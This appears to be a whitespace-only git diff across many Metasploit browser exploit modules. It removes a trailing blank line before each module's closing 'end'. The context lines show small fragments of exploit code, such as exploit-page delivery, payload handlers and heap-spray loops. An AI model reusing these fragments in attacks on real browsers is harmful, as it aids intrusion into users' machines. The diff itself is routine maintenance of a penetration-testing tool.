a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb +++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb @@ -283,5 +283,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/java_cmm.rb b/modules/exploits/windows/browser/java_cmm.rb index 3c1c1d82b5..d673181a0d 100644 --- a/modules/exploits/windows/browser/java_cmm.rb +++ b/modules/exploits/windows/browser/java_cmm.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote html += %Q|</applet></body></html>| return html end - end diff --git a/modules/exploits/windows/browser/java_codebase_trust.rb b/modules/exploits/windows/browser/java_codebase_trust.rb index e382b0207f..595e62a747 100644 --- a/modules/exploits/windows/browser/java_codebase_trust.rb +++ b/modules/exploits/windows/browser/java_codebase_trust.rb @@ -156,5 +156,4 @@ EOS end end - end diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb index ef38b795ec..b25f14dd93 100644 --- a/modules/exploits/windows/browser/java_docbase_bof.rb +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -242,5 +242,4 @@ EOS 'Pragma' => 'no-cache' }) end - end diff --git a/modules/exploits/windows/browser/java_mixer_sequencer.rb b/modules/exploits/windows/browser/java_mixer_sequencer.rb index 07a0220454..53da06be62 100644 --- a/modules/exploits/windows/browser/java_mixer_sequencer.rb +++ b/modules/exploits/windows/browser/java_mixer_sequencer.rb @@ -190,5 +190,4 @@ class MetasploitModule < Msf::Exploit::Remote @rmf_name, @rmf = get_rmf super end - end diff --git a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb index 28e757f663..3800f184cc 100644 --- a/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb +++ b/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb @@ -372,5 +372,4 @@ document.location = "#{js_uri}"; super end - end diff --git a/modules/exploits/windows/browser/java_ws_double_quote.rb b/modules/exploits/windows/browser/java_ws_double_quote.rb index 0700b7dda0..31a5a73014 100644 --- a/modules/exploits/windows/browser/java_ws_double_quote.rb +++ b/modules/exploits/windows/browser/java_ws_double_quote.rb @@ -304,5 +304,4 @@ EOS end super end - end diff --git a/modules/exploits/windows/browser/java_ws_vmargs.rb b/modules/exploits/windows/browser/java_ws_vmargs.rb index 8132bb9729..63bc375770 100644 --- a/modules/exploits/windows/browser/java_ws_vmargs.rb +++ b/modules/exploits/windows/browser/java_ws_vmargs.rb @@ -319,5 +319,4 @@ EOS super end - end diff --git a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb index 22111e231e..f6f87e4606 100644 --- a/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb +++ b/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index 25b1aab706..6840dff117 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -104,5 +104,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb index a2d853e31c..9cf5a1d0da 100644 --- a/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb +++ b/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb @@ -313,5 +313,4 @@ class MetasploitModule < Msf::Exploit::Remote super end - end diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index 456db6ebd8..1a6c20c8c9 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index 6338f4c192..59be6c5488 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -110,5 +110,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index 7174ce0cb7..086e3a5c5b 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index c008de3a79..e04b2af394 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(cli) end - end diff --git a/modules/exploits/windows/browser/malwarebytes_update_exec.rb b/modules/exploits/windows/browser/malwarebytes_update_exec.rb index c050c64764..4dd101fa9d 100644 --- a/modules/exploits/windows/browser/malwarebytes_update_exec.rb +++ b/modules/exploits/windows/browser/malwarebytes_update_exec.rb @@ -120,5 +120,4 @@ class MetasploitModule < Msf::Exploit::Remote 'Content-Type' => 'application/x-msdos-program' ) end - end diff --git a/modules/exploits/windows/browser/maxthon_history_xcs.rb b/modules/exploits/windows/browser/maxthon_history_xcs.rb index abe0f807a0..4fd8d323fb 100644 --- a/modules/exploits/windows/browser/maxthon_history_xcs.rb +++ b/modules/exploits/windows/browser/maxthon_history_xcs.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Exploit::Remote send_response_html(cli, content) end - end diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index a7730cca18..fe2b413b8e 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/mcafee_mvt_exec.rb b/modules/exploits/windows/browser/mcafee_mvt_exec.rb index d6a5a445e6..41969f2a4c 100644 --- a/modules/exploits/windows/browser/mcafee_mvt_exec.rb +++ b/modules/exploits/windows/browser/mcafee_mvt_exec.rb @@ -114,5 +114,4 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 25413b526b..209070d4d0 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index a5157e8a14..dc570e1498 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb index 126ca2615c..a4c2740f85 100644 --- a/modules/exploits/windows/browser/mozilla_attribchildremoved.rb +++ b/modules/exploits/windows/browser/mozilla_attribchildremoved.rb @@ -392,6 +392,5 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, content, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb index 8f96751725..a5b68315db 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb @@ -173,5 +173,4 @@ document.addEventListener("readystatechange",a,null); send_response(cli, content, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb index 5b12aa8daf..f174c7803d 100644 --- a/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb +++ b/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb @@ -194,5 +194,4 @@ function run() { send_response(cli, content, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index cbd07fe234..5ca9b38a1f 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -286,5 +286,4 @@ else { EOS end - end diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 757682046d..d6567f57a4 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -344,5 +344,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb index fa1f76d93b..2666407453 100644 --- a/modules/exploits/windows/browser/mozilla_nssvgvalue.rb +++ b/modules/exploits/windows/browser/mozilla_nssvgvalue.rb @@ -338,5 +338,4 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, content, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 2ef35aab7b..c08810b3b8 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -100,5 +100,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index f59b363b43..3006b92944 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -182,5 +182,4 @@ class MetasploitModule < Msf::Exploit::Remote return [7, 0x041b].pack('Vv') + rand_text(8) end end - end diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index b6db50c277..30b5bcb53a 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -138,5 +138,4 @@ function #{var_start}() { # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index 14fca624b6..2395a3dd37 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -122,5 +122,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index 3df7566e28..5dbc3b9be3 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -117,5 +117,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index 7391ab198a..370e994673 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -111,5 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 82a3305d4a..0e66966fe2 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -131,5 +131,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb index fa48b5d18d..eb6b63fb5f 100644 --- a/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/browser/ms07_017_ani_loadimage_chunksize.rb @@ -525,5 +525,4 @@ class MetasploitModule < Msf::Exploit::Remote return ani end - end diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index 05e3031682..ba86603b76 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -91,5 +91,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index f24bb3aa60..42e56c74ca 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb index d7f3a33f9e..f9b1ecac02 100644 --- a/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb +++ b/modules/exploits/windows/browser/ms08_070_visual_studio_msmask.rb @@ -115,5 +115,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb index 928ecbf2e7..c83174e79c 100644 --- a/modules/exploits/windows/browser/ms09_043_owc_msdso.rb +++ b/modules/exploits/windows/browser/ms09_043_owc_msdso.rb @@ -128,5 +128,4 @@ for(xj=0; xj<10; xj++){ # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms10_002_ie_object.rb b/modules/exploits/windows/browser/ms10_002_ie_object.rb index 5ad74a175b..74f08a0134 100644 --- a/modules/exploits/windows/browser/ms10_002_ie_object.rb +++ b/modules/exploits/windows/browser/ms10_002_ie_object.rb @@ -250,7 +250,6 @@ function Start() { return rop_payload end - end =begin diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index 896b438643..bb18300fc2 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -235,5 +235,4 @@ document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank"; handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb index e2f98ca51d..8fd0e5f1e0 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb @@ -110,5 +110,4 @@ for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_s handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb index ee5dd88a2f..776e88f59e 100644 --- a/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb +++ b/modules/exploits/windows/browser/ms10_022_ie_vbscript_winhlp32.rb @@ -317,5 +317,4 @@ MsgBox "Welcome! Press F1 to dismiss this dialog.", ,"Welcome!", "#{unc}", 1 super end - end diff --git a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb index 1b4b72872d..fbccb31fd3 100644 --- a/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb +++ b/modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb @@ -215,5 +215,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending #{self.name}") send_response_html(cli, html) end - end diff --git a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb index 206807fc93..927da02b72 100644 --- a/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb +++ b/modules/exploits/windows/browser/ms10_090_ie_css_clip.rb @@ -207,5 +207,4 @@ EOS handler(cli) end - end diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index 42940dc975..5d4f267763 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -439,5 +439,4 @@ EOS fail_with(Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key] rvas['BaseAddress'] + rvas[key] end - end diff --git a/modules/exploits/windows/browser/ms11_093_ole32.rb b/modules/exploits/windows/browser/ms11_093_ole32.rb index 781ba57f55..fc4ee769a1 100644 --- a/modules/exploits/windows/browser/ms11_093_ole32.rb +++ b/modules/exploits/windows/browser/ms11_093_ole32.rb @@ -176,6 +176,5 @@ class MetasploitModule < Msf::Exploit::Remote fd.close return vsd end - end diff --git a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb index 1940b5965c..c573958db9 100644 --- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb +++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb @@ -267,5 +267,4 @@ class MetasploitModule < Msf::Exploit::Remote # Transmit the response to the client send_response_html(cli, content) end - end diff --git a/modules/exploits/windows/browser/ms12_037_same_id.rb b/modules/exploits/windows/browser/ms12_037_same_id.rb index 0fe2e63e21..8498243419 100644 --- a/modules/exploits/windows/browser/ms12_037_same_id.rb +++ b/modules/exploits/windows/browser/ms12_037_same_id.rb @@ -266,7 +266,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb index d224d9bb21..aabdab5549 100644 --- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb +++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb @@ -195,6 +195,5 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb index 76fd27b45c..60f26612be 100644 --- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb +++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb @@ -136,6 +136,5 @@ EOF send_exploit_html(cli, exploit_template(cli, target_info)) end end - end diff --git a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb index 933bb6a285..d18a58de9c 100644 --- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb +++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb @@ -425,5 +425,4 @@ function exploit(){ end end - end diff --git a/modules/exploits/windows/browser/ms13_069_caret.rb b/modules/exploits/windows/browser/ms13_069_caret.rb index 6ba8512502..d8095fa6ee 100644 --- a/modules/exploits/windows/browser/ms13_069_caret.rb +++ b/modules/exploits/windows/browser/ms13_069_caret.rb @@ -211,7 +211,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending exploit...") send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) end - end =begin diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb index 1865698449..906b9a9aeb 100644 --- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb +++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb @@ -307,7 +307,6 @@ function kaiju() { @js_default_str = Rex::Text.rand_text_alpha(6) super end - end diff --git a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb index 64009ca45e..65b7a9c320 100644 --- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb +++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb @@ -183,7 +183,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_exploit_html(cli, exploit_template(cli, target_info)) end - end =begin diff --git a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb index 310865586f..aefa481202 100644 --- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb +++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb @@ -199,5 +199,4 @@ class MetasploitModule < Msf::Exploit::Remote return html_template, binding() end - end diff --git a/modules/exploits/windows/browser/ms14_012_textrange.rb b/modules/exploits/windows/browser/ms14_012_textrange.rb index c09549f956..8ac4c727ee 100644 --- a/modules/exploits/windows/browser/ms14_012_textrange.rb +++ b/modules/exploits/windows/browser/ms14_012_textrange.rb @@ -149,5 +149,4 @@ class MetasploitModule < Msf::Exploit::Remote def on_request_exploit(cli, request, target_info) send_exploit_html(cli, exploit_html) end - end diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb index dd5791c4d6..b1ffd534d0 100644 --- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb +++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb @@ -385,6 +385,5 @@ end function send_exploit_html(cli, get_html) end end - end diff --git a/modules/exploits/windows/browser/ms16_051_vbscript.rb b/modules/exploits/windows/browser/ms16_051_vbscript.rb index a4cc7016cf..5a3cbcf808 100644 --- a/modules/exploits/windows/browser/ms16_051_vbscript.rb +++ b/modules/exploits/windows/browser/ms16_051_vbscript.rb @@ -475,6 +475,5 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, exploit_html(request.uri)) end end - end diff --git a/modules/exploits/windows/browser/msvidctl_mpeg2.rb b/modules/exploits/windows/browser/msvidctl_mpeg2.rb index 1d98baff20..4e8f1ea324 100644 --- a/modules/exploits/windows/browser/msvidctl_mpeg2.rb +++ b/modules/exploits/windows/browser/msvidctl_mpeg2.rb @@ -238,5 +238,4 @@ var #{msvidctl}=document.createElement('object'); # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/mswhale_checkforupdates.rb b/modules/exploits/windows/browser/mswhale_checkforupdates.rb index adb653b740..fcb705915e 100644 --- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb +++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb @@ -112,5 +112,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb index 49d3afdb46..a370bfcaaa 100644 --- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb +++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb @@ -375,7 +375,6 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb index e6d48b87b8..e8f97b4dfe 100644 --- a/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb +++ b/modules/exploits/windows/browser/nctaudiofile2_setformatlikesample.rb @@ -108,5 +108,4 @@ var #{strname} = new String('#{sploit}'); # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/nis2004_antispam.rb b/modules/exploits/windows/browser/nis2004_antispam.rb index fe50125486..6f847a9246 100644 --- a/modules/exploits/windows/browser/nis2004_antispam.rb +++ b/modules/exploits/windows/browser/nis2004_antispam.rb @@ -109,5 +109,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index 10bfd980be..5690cc8a6c 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/notes_handler_cmdinject.rb b/modules/exploits/windows/browser/notes_handler_cmdinject.rb index 06349664b4..a00ce8a724 100644 --- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb +++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb @@ -178,5 +178,4 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb index e1307747e1..ed06059867 100644 --- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -271,7 +271,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/novelliprint_callbackurl.rb b/modules/exploits/windows/browser/novelliprint_callbackurl.rb index 833efdb39a..1e518882d5 100644 --- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb +++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb @@ -141,5 +141,4 @@ for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/novelliprint_datetime.rb b/modules/exploits/windows/browser/novelliprint_datetime.rb index c8e980d637..07a662c99a 100644 --- a/modules/exploits/windows/browser/novelliprint_datetime.rb +++ b/modules/exploits/windows/browser/novelliprint_datetime.rb @@ -130,5 +130,4 @@ class MetasploitModule < Msf::Exploit::Remote } ret end - end diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index 78f7bba286..cb2a56022c 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -106,5 +106,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb index 26437249c4..ca142ecaab 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb @@ -147,5 +147,4 @@ for (#{j_counter} = 0; #{j_counter} <= #{offset}; #{j_counter}++) { # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index 96504b54f2..fd57e9419f 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -107,5 +107,4 @@ for (#{var_i} = 0; #{var_i} < 99024; #{var_i}++) { #{rand8} = #{rand8} + unescap # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/novelliprint_target_frame.rb b/modules/exploits/windows/browser/novelliprint_target_frame.rb index bf840213ca..278c4b59e4 100644 --- a/modules/exploits/windows/browser/novelliprint_target_frame.rb +++ b/modules/exploits/windows/browser/novelliprint_target_frame.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Exploit::Remote } ret end - end diff --git a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb index c9503bd66d..086711ee3b 100644 --- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb +++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb @@ -117,5 +117,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb 